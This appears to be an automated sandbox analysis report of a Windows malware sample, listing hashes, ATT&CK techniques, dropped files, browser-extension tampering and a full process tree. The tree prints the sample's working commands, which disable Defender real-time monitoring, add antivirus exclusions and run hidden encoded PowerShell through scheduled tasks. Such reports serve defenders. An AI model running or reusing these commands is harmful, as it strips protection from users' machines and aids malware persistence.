44483ca13b239cd945275aa6aea3701bd6fc429b5f76a36819e726fdc377459c

Analysis

max time kernel
106s
max time network
111s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
28-05-2024 01:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
Size

6.6MB
MD5

bd741cae4a5955c610761f5d76c24a33
SHA1

84138e2a3a7383f3aa2374a2e73d7e406c65c6d0
SHA256

44483ca13b239cd945275aa6aea3701bd6fc429b5f76a36819e726fdc377459c
SHA512

04fdc372eb393d2515b3fe0a8ce1ae4556d73b1c9c0debba671173e8584ce7f1b5ce2604763704aedfa4fd13916c8ff5fbf153758baa7ecea55886f7a8b70366
SSDEEP

196608:lNZILIcmCamzQRRkXeIt063S0Piv2QPMm9awLSN0p:lNqIBCayQRANC0Piv2Qr9J

Score

10^/10

discovery evasion execution spyware stealer trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Windows security bypass 2 TTPs 30 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\pwHRhheBOrJCKgILh = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\WfWMfMBmpceHOoPp = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\WmDfgxqULrgOkJVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\HyPszsbozHjU2 = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\sdIWsxsIljAmC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\WfWMfMBmpceHOoPp = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\FXcAieiFOJUrqqKhXGR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\czlHcasKUAUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\YdicROZXU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2680	powershell.exe
1072	powershell.EXE
784	powershell.EXE
1232	powershell.exe
1532	powershell.EXE

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops Chrome extension 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnknkapchbklfgbfimfgcapmdnlkdajg\1.2_0\manifest.json	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe

Drops file in System32 directory 9 IoCs

description	ioc	Process
File created	C:\Windows\system32\GroupPolicy\gpt.ini	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Drops file in Program Files directory 13 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\HyPszsbozHjU2\TkRxQJmtjNmoj.dll	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
File created	C:\Program Files (x86)\czlHcasKUAUn\THGrWOF.dll	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
File created	C:\Program Files (x86)\YdicROZXU\kxJtNo.dll	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{EF7EF554-D23D-4BD5-A178-25C4A3726B49}.xpi	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
File created	C:\Program Files (x86)\FXcAieiFOJUrqqKhXGR\uhmHXEV.xml	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
File created	C:\Program Files (x86)\sdIWsxsIljAmC\QSUYWGX.dll	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
File created	C:\Program Files (x86)\FXcAieiFOJUrqqKhXGR\waxaGdW.dll	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
File created	C:\Program Files (x86)\sdIWsxsIljAmC\vuPVdzl.xml	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{EF7EF554-D23D-4BD5-A178-25C4A3726B49}.xpi	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
File created	C:\Program Files (x86)\YdicROZXU\fUGMtzw.xml	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
File created	C:\Program Files (x86)\HyPszsbozHjU2\fhScxsV.xml	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\NZVNOJbpXMfOcZM.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1280	2612	WerFault.exe	27

Creates scheduled task(s) 1 TTPs 9 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2056	schtasks.exe
440	schtasks.exe
908	schtasks.exe
2956	schtasks.exe
2444	schtasks.exe
2144	schtasks.exe
1908	schtasks.exe
2500	schtasks.exe
1632	schtasks.exe

Suspicious behavior: EnumeratesProcesses 36 IoCs

pid	Process
2680	powershell.exe
2680	powershell.exe
2680	powershell.exe
1072	powershell.EXE
1072	powershell.EXE
1072	powershell.EXE
784	powershell.EXE
784	powershell.EXE
784	powershell.EXE
1232	powershell.exe
1532	powershell.EXE
1532	powershell.EXE
1532	powershell.EXE
2612	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
2612	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
2612	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
2612	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
2612	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
2612	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
2612	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
2612	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
2612	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
2612	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
2612	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
2612	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
2612	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
2612	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
2612	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
2612	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
2612	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
2612	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
2612	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
2612	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
2612	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
2612	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
2612	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe

Suspicious use of AdjustPrivilegeToken 25 IoCs

description	pid	Process
Token: SeDebugPrivilege	2680	powershell.exe
Token: SeDebugPrivilege	1072	powershell.EXE
Token: SeDebugPrivilege	784	powershell.EXE
Token: SeDebugPrivilege	1232	powershell.exe
Token: SeIncreaseQuotaPrivilege	1560	WMIC.exe
Token: SeSecurityPrivilege	1560	WMIC.exe
Token: SeTakeOwnershipPrivilege	1560	WMIC.exe
Token: SeLoadDriverPrivilege	1560	WMIC.exe
Token: SeSystemProfilePrivilege	1560	WMIC.exe
Token: SeSystemtimePrivilege	1560	WMIC.exe
Token: SeProfSingleProcessPrivilege	1560	WMIC.exe
Token: SeIncBasePriorityPrivilege	1560	WMIC.exe
Token: SeCreatePagefilePrivilege	1560	WMIC.exe
Token: SeBackupPrivilege	1560	WMIC.exe
Token: SeRestorePrivilege	1560	WMIC.exe
Token: SeShutdownPrivilege	1560	WMIC.exe
Token: SeDebugPrivilege	1560	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1560	WMIC.exe
Token: SeRemoteShutdownPrivilege	1560	WMIC.exe
Token: SeUndockPrivilege	1560	WMIC.exe
Token: SeManageVolumePrivilege	1560	WMIC.exe
Token: 33	1560	WMIC.exe
Token: 34	1560	WMIC.exe
Token: 35	1560	WMIC.exe
Token: SeDebugPrivilege	1532	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2612 wrote to memory of 2468	2612	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe	28
PID 2612 wrote to memory of 2468	2612	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe	28
PID 2612 wrote to memory of 2468	2612	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe	28
PID 2612 wrote to memory of 2468	2612	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe	28
PID 2468 wrote to memory of 2884	2468	cmd.exe	30
PID 2468 wrote to memory of 2884	2468	cmd.exe	30
PID 2468 wrote to memory of 2884	2468	cmd.exe	30
PID 2468 wrote to memory of 2884	2468	cmd.exe	30
PID 2884 wrote to memory of 2516	2884	forfiles.exe	31
PID 2884 wrote to memory of 2516	2884	forfiles.exe	31
PID 2884 wrote to memory of 2516	2884	forfiles.exe	31
PID 2884 wrote to memory of 2516	2884	forfiles.exe	31
PID 2516 wrote to memory of 2504	2516	cmd.exe	32
PID 2516 wrote to memory of 2504	2516	cmd.exe	32
PID 2516 wrote to memory of 2504	2516	cmd.exe	32
PID 2516 wrote to memory of 2504	2516	cmd.exe	32
PID 2468 wrote to memory of 2524	2468	cmd.exe	33
PID 2468 wrote to memory of 2524	2468	cmd.exe	33
PID 2468 wrote to memory of 2524	2468	cmd.exe	33
PID 2468 wrote to memory of 2524	2468	cmd.exe	33
PID 2524 wrote to memory of 2584	2524	forfiles.exe	34
PID 2524 wrote to memory of 2584	2524	forfiles.exe	34
PID 2524 wrote to memory of 2584	2524	forfiles.exe	34
PID 2524 wrote to memory of 2584	2524	forfiles.exe	34
PID 2584 wrote to memory of 2588	2584	cmd.exe	35
PID 2584 wrote to memory of 2588	2584	cmd.exe	35
PID 2584 wrote to memory of 2588	2584	cmd.exe	35
PID 2584 wrote to memory of 2588	2584	cmd.exe	35
PID 2468 wrote to memory of 2628	2468	cmd.exe	36
PID 2468 wrote to memory of 2628	2468	cmd.exe	36
PID 2468 wrote to memory of 2628	2468	cmd.exe	36
PID 2468 wrote to memory of 2628	2468	cmd.exe	36
PID 2628 wrote to memory of 2632	2628	forfiles.exe	37
PID 2628 wrote to memory of 2632	2628	forfiles.exe	37
PID 2628 wrote to memory of 2632	2628	forfiles.exe	37
PID 2628 wrote to memory of 2632	2628	forfiles.exe	37
PID 2632 wrote to memory of 2580	2632	cmd.exe	38
PID 2632 wrote to memory of 2580	2632	cmd.exe	38
PID 2632 wrote to memory of 2580	2632	cmd.exe	38
PID 2632 wrote to memory of 2580	2632	cmd.exe	38
PID 2468 wrote to memory of 2688	2468	cmd.exe	39
PID 2468 wrote to memory of 2688	2468	cmd.exe	39
PID 2468 wrote to memory of 2688	2468	cmd.exe	39
PID 2468 wrote to memory of 2688	2468	cmd.exe	39
PID 2688 wrote to memory of 2752	2688	forfiles.exe	40
PID 2688 wrote to memory of 2752	2688	forfiles.exe	40
PID 2688 wrote to memory of 2752	2688	forfiles.exe	40
PID 2688 wrote to memory of 2752	2688	forfiles.exe	40
PID 2752 wrote to memory of 2380	2752	cmd.exe	41
PID 2752 wrote to memory of 2380	2752	cmd.exe	41
PID 2752 wrote to memory of 2380	2752	cmd.exe	41
PID 2752 wrote to memory of 2380	2752	cmd.exe	41
PID 2468 wrote to memory of 2748	2468	cmd.exe	42
PID 2468 wrote to memory of 2748	2468	cmd.exe	42
PID 2468 wrote to memory of 2748	2468	cmd.exe	42
PID 2468 wrote to memory of 2748	2468	cmd.exe	42
PID 2748 wrote to memory of 2492	2748	forfiles.exe	43
PID 2748 wrote to memory of 2492	2748	forfiles.exe	43
PID 2748 wrote to memory of 2492	2748	forfiles.exe	43
PID 2748 wrote to memory of 2492	2748	forfiles.exe	43
PID 2492 wrote to memory of 2680	2492	cmd.exe	44
PID 2492 wrote to memory of 2680	2492	cmd.exe	44
PID 2492 wrote to memory of 2680	2492	cmd.exe	44
PID 2492 wrote to memory of 2680	2492	cmd.exe	44

C:\Users\Admin\AppData\Local\Temp\2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
"C:\Users\Admin\AppData\Local\Temp\2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe"
1⤵
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2612
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2468
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2884
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2516
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:2504
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2524
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2584
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:2588
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2628
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2632
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:2580
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2688
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2752
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:2380
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2748
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2492
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2680
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:1652
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gbnFsceen" /SC once /ST 00:07:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:1908
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gbnFsceen"
  2⤵
  PID:3008
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gbnFsceen"
  2⤵
  PID:2336
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
  2⤵
  PID:636
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:2412
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
  2⤵
  PID:2724
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:2568
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gddMUEvAd" /SC once /ST 00:06:59 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:2056
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gddMUEvAd"
  2⤵
  PID:564
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gddMUEvAd"
  2⤵
  PID:1312
- C:\Windows\SysWOW64\forfiles.exe
  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
  2⤵
  PID:2052
- - C:\Windows\SysWOW64\cmd.exe
    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
    3⤵
    PID:528
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1232
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1560
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WfWMfMBmpceHOoPp" /t REG_DWORD /d 0 /reg:32
  2⤵
  PID:2224
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WfWMfMBmpceHOoPp" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    PID:2032
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WfWMfMBmpceHOoPp" /t REG_DWORD /d 0 /reg:64
  2⤵
  PID:2072
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WfWMfMBmpceHOoPp" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    PID:1980
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WfWMfMBmpceHOoPp" /t REG_DWORD /d 0 /reg:32
  2⤵
  PID:1708
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WfWMfMBmpceHOoPp" /t REG_DWORD /d 0 /reg:32
    3⤵
